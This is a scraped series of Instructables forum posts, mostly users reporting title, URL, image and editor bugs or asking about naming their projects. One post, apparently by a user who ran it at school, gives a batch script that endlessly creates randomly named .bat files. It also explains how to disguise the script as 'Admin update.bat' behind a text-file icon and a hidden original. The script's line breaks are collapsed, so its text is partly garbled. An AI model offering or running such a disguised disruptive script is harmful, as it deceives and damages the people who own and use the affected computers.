Wrong Title After Publishing

I just published an instructable and for some reason the title was changed to one of the section titles.  I was able to restore the title in the instructable, but the link has a misleading URL.  How can this be corrected to reflect the title of the instructable?

Which is the better picture to use for a title image?

I have a new instructable in the works after a long hiatus :) I have some options for the title image for my next instructable and I don't know which one to choose.  So picture 1 (jar with green napkin), picture 2 (jar with wooden background), picture 3 (close up), or picture 4 (jar with green background)?

Need to Change title of Link to my instructable

Hi guys and girls, I just published an instructable and I had a typo in the title. I wrote Duck tape instead of Duct Tape.(dont tell me you havent done that! LOL) Anyway, so I went through and changed the title in the edittor and unpublished and republished the instructable. The link at the top of the web browser (and the final downloadable .pdf) still say DUCK_TAPE_BINDING... Its funny, but its not.. I need an admit to change it for me. I've been trying for a couple of hours now, and there is nothing I can do client-side to change it. Thanks!

Title image for instructable isn't consistent

I posted this instructable this morning, and only just noticed that the main image you see when viewing the instructable and the main image you see when browsing or looking at my instructables on my member page are different images. Is there a bug, or is there something you need to do to specify the main image in the new editor?

No more author names?

I have noticed that the author's names are not attatched to the posts anymore, i.e. -"My Post" By:Tinker83- in the intro. is this going to be a permanent fixture or is it something temporary? it's not a huge problem, but its kind of nice to just look up and see who wrote it.

The Title's of Instructables aren't being changed anymore in the Newsletter?

Has the staff stopped changing the title's of Instructables that get featured in the Newsletter? They used to change it, but it looks like they've stopped doing that. Why?

Titles - can we add a subcategory? like HTM Candy: Hard Candy, or HTM Candy: Gummies

I have a couple of different Instructables that I'd like to post, and they both fit the same title. Could I add a subtitle to the official required title to make it a more specific like this? How to Make Candy: Hard Candy How to Make Candy: Gummies I've seen some people do that, but don't know if that is what you are looking for.

Title in Primary Images

Dear Instructables Authors, Does anyone find the current trend of putting the title of an ible in the primary image as visually offending as I do? The format of the site puts the title right below the image in a concise and legible manner that doesn't interfere with the image of the project. Why clutter your image with unnecessary (often poorly chosen) typography? Please stop. Sincerely, Aesthetically Repulsed

How to make a Graphical Search and still keep the keyword in the title?

When I want to search instructables related to love for example, I put "heart" in the searchbox and a lot of related instructables appear. Good. The problem starts when I want to do a graphical search to actually see the project, but when I want it sorted by "Featured", "Views" or other thing, the search engine searches for the word "heart" in the whole instructable! If it's an instructable about a laser cutter for example, just because the ible' says in a step "You can make coins, hearts, etc etc......" the search engine automatically puts it on top of the list because it's featured.... How stupid is this?!?!?! Can someone help me please? Thanks for your kind responses.

Instructable steps - formatting has changed - extra characters

My instructable has changed.  https://www.instructables.com/id/Electronic-Wart-Removal-8211-No-Blood-Little-/ The step title formatting is not what I entered.  I typed in the title but when previewed shows only part of the title with the rest of the title within the text body.  It also has extra text, strange characters showing in the preview screen. When the whole step is viewed it looks correct.  It's in the quick view (cursor over the step) that the problem shows.

How to fix error in title of my instructable?

I recently submitted my first instructable, "Easy But Addicting Garlic & Butter Snack Mix".  Before publishing it I spell-checked it twice and made good and sure that there were no typos or mispellings.  It has now been published, and there is a GREAT BIG TYPO in the title!!!  It appears this way: "Easy But Addicting Garlic & Butter Snack M&hellip".  This is not how it was submitted, and when I click on the entry the title appears just fine; it is only in the main page of Snack Food Contest entries that it appears wrong.  I have submitted 2 emails to the instructables team but keep getting automated responses that are of no help.  I can't seem to fix the problem in "edit" from my account, as it appears to be fine when I view it that way.  How did this happen, and how do I get it corrected?  Help!!

Spellcheck feature missing in create instructable title form field

1. What Operating system the device you are using OS X YOSEMITE 10.10.3 2. Browser information including version number, if you're using the mobile app include app version number. CHROME FOR DESKTOP Version 42.0.2311.90 (64-bit) 3. Include what project or url you were looking at when the error occurred My latest submission had typos in the titles. When I went to correct the error I noticed that I had spelled it correctly in the description form fields. This made me wonder how this happened. This is when I realized that the title fields were not spellchecking. This resulted in a typo. https://www.instructables.com/id/Recycle-Combination-Lock-into-Knecklace/ 4. Screen shots of what happened if available. See attached 5. steps to reproduce Step 1 : Simply open an existing Instructable or create a new Instructable Step 2 : Add a new step Step 3 : Add a title incorrectly spelled in my case I typed "Knecklace" Step 4 : Now type the same word in the description field "Knecklace" Step 5 : Note how there is a typo warning in the description but not in the title

Is the new answers-less layout permenant?

Just curious, site went down for maintenance today, and now that it's back, the answers section is gone from the title header.  Is answers going the way of the dodo bird?

Help With Title for Article

For the final exam in my Journalism class, students are required to write an article detailing an event or period of time in their family history. I chose to write about the two-year tour of duty that my Grandfather served in the Vietnam War. He was never sent overseas, but instead served as a medical officer at an army general hospital. At this point, I have written my entire article, but still need a title. I had considered "Life at War", but didn't know if that would be considered plagiarism because of the Denise Levertov poem by the same name. Do you have any suggestions/hints/ideas/etc. that could help me? Thanks in advance.

You page "sort" buttons not doing their job..

I dont know if this was pointed out already as I am unable to "search the forums"! but I noticed today that when on my "you page", "instructables tab", the sort buttons are not working. views, title, date etc, none are sorting properly, they are stuck on "featured" sort. the only one that changes the sort is the "ratings button". from what i know those ratings are dis-abled now, are they not? If you need some screen shots let me know. I'm on a mac running windows 7 64 bit, with firefox latest update.

I did this at school. Open notepad, copy and paste this, then save it as Admin update.bat & then when you've saved it, create a shortcut then hide the original file. After that, change the icon to the one that looks like the .txt file(i am not responsible for what you do with this):@echo off:1set title=%random%@echo off>%title%.bat:1>%title%.batset title=%random%>%title%.bat@echo off>%title%.bat>%title%.bat:1>%title%.bat>%title%.batset title=%random%>%title%.bat>%title%.batgoto 1>%title%.batgoto 1

Titling Instructables

Whenever I try to title my Instructables, the editor seems to want to put my email address as the title. It'll keep reverting to my email address as well. Anyone else have this issue? How can I fix it?

Posted by TheOriginalPhoenix 1 year ago

Silly, trivial question about titles for Instructables...

Is the prefix phrase 'How To Make...' superfluous when creating an instructable? Which is better?: "How to make Fruity Oaty Bars" or just "Fruity Oaty Bars"

Title keeps disappearing

The title of this instructable keeps disappearing: https://www.instructables.com/id/Paper-Mache-Jack-o-Lantern/ I have had to go in to the editor and retype it in a few time since it's been published.  It seems to randomly disappear.

Should Instructables titles begin with "How to..."?

I tend to write the titles of my 'ibles as if the phrase "How to..." was already there. Thus: Get Any Information... Knit replacement pads... etc. I notice, though, that most of the Burning Questions begin with "How to..." This suggests that people are searching using those words. So, should I change all my titles to start that way, or just leave them as-is?

Quotation marks cause problems in titles

Hello all, I've hit a bit of a problem with my latest instructable: https://www.instructables.com/id/Lady-Gaga-2/ You may note that the title shown in the URL is Lady-Gaga-2.  The original title I used was:  Lady Gaga "You and I" Hat and Robot Arm.  When I went to publish, everything including the first " and beyond was deleted. I changed it, moving the "You and I" to the end of the title.  It worked right for a while, but it seems to have vanished again. Is this an actual bug, or should I just avoid using quotation marks in titles? Incidentally, as of 11:04 this morning, this instructable is still stuck in the filters.  Can someone unstick it? Thanks for all your good works!

Bug report: Title images for open contests incorrect on mobile device

Minor bug report. On a mobile device (Android Moto X) using the Instructables app (version 2.0.2), when looking at the open contests, some contests (incorrectly) have the same title image. See attached screenshots. Specifically, the DIY University Contest and Hunter-Gatherer Contest both have the same incorrect contest title image (the Remix Contest's image), and the Hand Tools Only Contest has the incorrect contest title image (the Teach It! Contest's image). So, it's super minor, but thought you'd like to know.

Can't replace the "title" image!

I just uploaded a new image for the "main" image of my instructable because I didn't like the old one. But when I search for my instructable on here, it shows my old picture that I removed as the "title" image on the website. Is there a way to change this, or will the website update it eventually?

Hover Over Title Bug in steps

So i was browsing the health by design, specifically the one about the grill smoker thing and I noticed that when I hovered over a step it was giving me some strange feedback. Instead of the step title and a portion of the content it said "false false 0 Internet Explorer ..." So I think there's a problem with the javascript or the php backend

Private message without title cannot be opened

I hadn't seen this bug reported. Private message without title cannot be opened. Instructables Robot should not allow to sent untitled PM. OR clicking whole area around message, in inbox screen, should lead to the matter of message. I know, what was in PM, because i have turned on email notifications, but i still have, in my profile, one unreaded message. Inbox (1).

Something funny going on in "SETTINGS' Email Alerts'" in profiles.

When I go into my profile to edit my email alerts, I click on the SETTINGS tab, then EMAIL ALERTS.  The page opens up expanded.  Next to the title is my email address.  I make the change I want and click UDATE SETTINGS.  That takes me to another page titled EMAIL ALERTS but the page is not expanded and there is someone else's email beside the title. What's up with that?

Picture uploaded to title page keeps being removed after about 3 days

I have had an instructable up for about a year here: https://www.instructables.com/id/Easy-build-self-balancing-skateboardrobotsegway-/ The picture I upload and attach to the title page keeps working for about 3 days then is removed. Consequently my Instructable has no title page picture. I keep re attaching the image and it works OK for about 3 days then is automatically removed. It is my photograph, not taken from anyone elses website so not a copyright issue. What is the problem? I have just reattached the image again now but within 3 days it will have gone again. Best wishes Xenon John

How did some groups get URLs different from their titles?

I have run across a few groups so far ( Kids in Science and Engineering, Grammar Police, and some others) where the Instructables directory name in their URL (i.e., www.../groups/XYZ) is not simply a slightly-mangled version of the title (space -> _, etc.).I'm curious how this was done. Did an earlier version of the Instructables interface allow creators to specify both a title and a "shortname"? Or did the Staff intervene manually in special cases?
